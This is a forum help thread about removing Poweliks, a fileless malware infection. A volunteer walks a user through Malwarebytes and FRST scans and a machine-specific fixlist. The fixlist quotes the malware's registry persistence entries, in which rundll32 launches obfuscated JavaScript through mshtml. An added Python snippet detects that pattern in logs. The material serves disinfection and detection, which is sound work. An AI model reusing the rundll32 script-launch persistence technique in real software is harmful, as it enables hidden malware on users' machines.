Need help removing multiple Explorer processes please

I am getting the constant pop up - Avast - avast! Web Shield has blocked a harmful webpage or file.

Various objects have appeared: go.wvydeo.com/results . . ., xmlka.com/click?app . . ., cdn1.movieroomreview.com/themes . . ., HTML: Redirector-gy [Trj]

The infection is usually URL:Mal…except that last one.

Process C:\Program Files.…\iexplorer.exe

I’m a newbie on here but read elsewhere here that I should start my own topic for this issue and look in task manager for multiple Explorer processes. I’ve got one explorer and two iexplorer processes. Is that all I’m looking for? And how do I get rid of this? Having an ISP outage or slow down in my area so will check back as I’m able.

Attach your basic logs. (MBAM, FRST and aswMBR…!!)
Instructions: https://forum.avast.com/index.php?topic=53253.0

Internet service was off yesterday and most of today but when I just got it back on to work on this, there have been no pop-ups so I decided out of curiosity to check the task manager and those two iexplorer processes are gone. I don’t understand that since I hadn’t even begun to run the scan instructions and logs you requested. Should I still go ahead with that? Is it possible that my problem has resolved itself?

Also if this is miraculously gone, how would I prevent it from happening again?

Attach the logs and find out … the check doesn't hurt

I was wrong, it’s not gone. Pop-ups started again and this time I have THREE “iexplorer” processes running instead of two. Plus it’s really slowing down my internet connection. I suspect that’s been the case all along now even though supposedly there are speed issues reported in my area anyway. In order to get some speed for downloading the scans, can I just “end” some of those processes? At this rate it’s going to take forever to get the logs done.

Hope I did this correctly. This is the Malwarebytes log. I had run this same scan last week when I first had this issue and it DID find issues then but I don’t know if I can get a copy of that log still or whether this is sufficient. There were no issues on this scan.

Farbar recovery logs

I accidentally saved this prior to the end of the scan then saved it again at the end. Hope that didn’t make a difference here. I thought it was through scanning sooner.

Hi, this will kill it.

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:

HKU\S-1-5-21-2706616055-1707385217-3273166068-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope value is missing.
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
2014-12-12 12:04 - 2014-05-13 10:15 - 00010240 _____ () C:\Users\Admin\AppData\Local\Z@!-d61b74fb-ea57-41ea-875c-14737e7b6101.tmp
2014-12-12 12:04 - 2014-05-13 10:15 - 00010240 _____ () C:\Users\Admin\AppData\Local\Z@!-a51c759c-f497-4830-8e3c-bc8e256fcccc.tmp
2014-12-12 12:04 - 2014-05-13 10:15 - 00009216 _____ () C:\Users\Admin\AppData\Local\Z@S!-da26b604-133e-495c-8f8d-c4ecd8656641.tmp
CustomCLSID: HKU\S-1-5-21-2706616055-1707385217-3273166068-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated; please post that.
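
A detection-side view of the two entries the fixlist above marks as Poweliks, as an added example that is not part of the original thread and not FRST's own code: it scans FRST-style log text for COM server registrations (LocalServer32 / InprocServer32) whose command line hands rundll32.exe a javascript: pseudo-URL rather than a DLL path. The function names are hypothetical, and the SID, CLSIDs, file paths and log lines are constructed placeholders.

```python
import re

# FRST-style line: optional "CustomCLSID: " prefix, a key ending in
# \LocalServer32 or \InprocServer32, then "->" or ":" and the value data.
ENTRY = re.compile(
    r'(?P<key>\S*\\(?:localserver32|inprocserver32))\s*(?:->|:)\s*(?P<data>.*)$',
    re.IGNORECASE)

def reasons_for(data):
    """Return why a COM server command line looks like script-in-registry persistence."""
    d = data.lower()
    reasons = []
    if 'rundll32' in d and 'javascript:' in d:
        reasons.append('rundll32 given a javascript: pseudo-URL instead of a DLL path')
    if 'runhtmlapplication' in d:
        reasons.append('mshtml.dll RunHTMLApplication entry point')
    return reasons

def scan(log_text):
    """Return (line_number, registry_key, reasons) for each suspicious COM server entry."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = ENTRY.search(line)
        if m:
            why = reasons_for(m.group('data'))
            if why:
                findings.append((n, m.group('key'), why))
    return findings

# Constructed sample input: placeholder SID, CLSIDs and paths, payload replaced by PLACEHOLDER.
SID = r'HKU\S-1-5-21-0000000000-0000000000-0000000000-1000_Classes\CLSID'
SAMPLE_LOG = '\n'.join([
    r'CustomCLSID: ' + SID + r'\{00000000-0000-0000-0000-000000000001}\InprocServer32 -> C:\Program Files\Example\shellext.dll (Example Corp)',
    r'CustomCLSID: ' + SID + r'\{00000000-0000-0000-0000-000000000002}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("PLACEHOLDER',
    # Legitimate use of rundll32 as a COM server host: a real DLL path, so it is not flagged.
    r'CustomCLSID: ' + SID + r'\{00000000-0000-0000-0000-000000000003}\LocalServer32 -> C:\Windows\System32\rundll32.exe C:\Program Files\Example\helper.dll,Start',
    r'Toolbar: HKLM - No Name - {00000000-0000-0000-0000-000000000004} - No File',
])

if __name__ == '__main__':
    for n, key, why in scan(SAMPLE_LOG):
        print(f'line {n}: {key}\n  ' + '\n  '.join(why))
```

A hit here only says the entry deserves a look; removal on a live machine still goes through a fixlist written for that machine, as in the post above.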

Was I to run a scan THEN fix? How long should the fix take? It’s been 20 minutes so far. Getting nervous that I messed it up.

Whew! Finished and here’s the log.

I still see 3 iexplorer processes running in task manager.

EmptyTemp: => Removed 6.4 GB temporary data. This was the reason for the long fix run :)

Three Iexplore is quite normal; this malware used the dllhost file.

How is the computer behaving now?

I remember seeing dllhost in task manager and that’s gone now. Will give it a day or two of use since the pop ups usually seemed to be delayed in starting. Then will post a follow up. So far so good though and I hope it continues to be. Thanks so much for the help!!!